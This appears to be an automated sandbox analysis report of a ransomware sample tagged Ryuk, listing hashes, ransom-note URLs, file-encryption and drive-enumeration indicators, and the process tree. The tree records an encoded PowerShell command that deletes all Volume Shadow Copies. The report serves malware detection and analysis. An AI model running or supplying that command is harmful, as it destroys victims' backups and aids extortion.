Analysis
-
max time kernel
156s -
max time network
141s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
24-01-2022 01:02
Static task
static1
Behavioral task
behavioral1
Sample
cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe
Resource
win10-en-20211208
General
-
Target
cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe
-
Size
115KB
-
MD5
193f84c1f7e306144ef53b019e46bd10
-
SHA1
4ab67ccfe975625992cf34c19c9bfc6d3a72ec38
-
SHA256
cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8
-
SHA512
dbe6f8fac6939bd14b7d476504a806aeab8b9b6a655cc6cbf10179452dd6707ca2ce3fa72653347417340a81d6a23e81bc8255dd4717cdfa20a1dc4c3756a7f9
Malware Config
Extracted
C:\o3r08vnz7l-readme.txt
ryuk
https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spread
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A0F1F924A1352797
http://decryptor.cc/A0F1F924A1352797
https://filehippo.com/download_tor_browser_for_windows/
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\ResetSkip.crw => \??\c:\users\admin\pictures\ResetSkip.crw.o3r08vnz7l cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\users\admin\pictures\RemoveDeny.tiff cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File renamed C:\Users\Admin\Pictures\RemoveDeny.tiff => \??\c:\users\admin\pictures\RemoveDeny.tiff.o3r08vnz7l cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\G: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\H: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\L: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\M: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\V: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\A: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\E: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\N: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\P: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\S: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\F: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\J: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\K: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\O: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\W: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\Y: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\I: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\Q: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\R: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\T: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\U: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\X: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\Z: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe -
Drops file in Program Files directory 12 IoCs
description ioc Process File opened for modification \??\c:\program files\NewRegister.m1v cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\SubmitMount.xhtml cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\SubmitSync.TTS cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File created \??\c:\program files\o3r08vnz7l-readme.txt cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File created \??\c:\program files (x86)\o3r08vnz7l-readme.txt cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\BackupUnregister.wmf cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\CompareUnpublish.mp2v cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\FormatFind.wdp cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\GetBlock.wma cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\SelectSplit.cfg cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\UnpublishFind.easmx cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\WriteSync.vssx cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 3808 cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe 3808 cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe 744 powershell.exe 744 powershell.exe 744 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 3808 cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe Token: SeDebugPrivilege 744 powershell.exe Token: SeBackupPrivilege 1248 vssvc.exe Token: SeRestorePrivilege 1248 vssvc.exe Token: SeAuditPrivilege 1248 vssvc.exe Token: SeTakeOwnershipPrivilege 3808 cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 3808 wrote to memory of 744 3808 cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe 73 PID 3808 wrote to memory of 744 3808 cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe 73
Processes
-
C:\Users\Admin\AppData\Local\Temp\cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe"C:\Users\Admin\AppData\Local\Temp\cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe"1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:744
-
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1168
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1248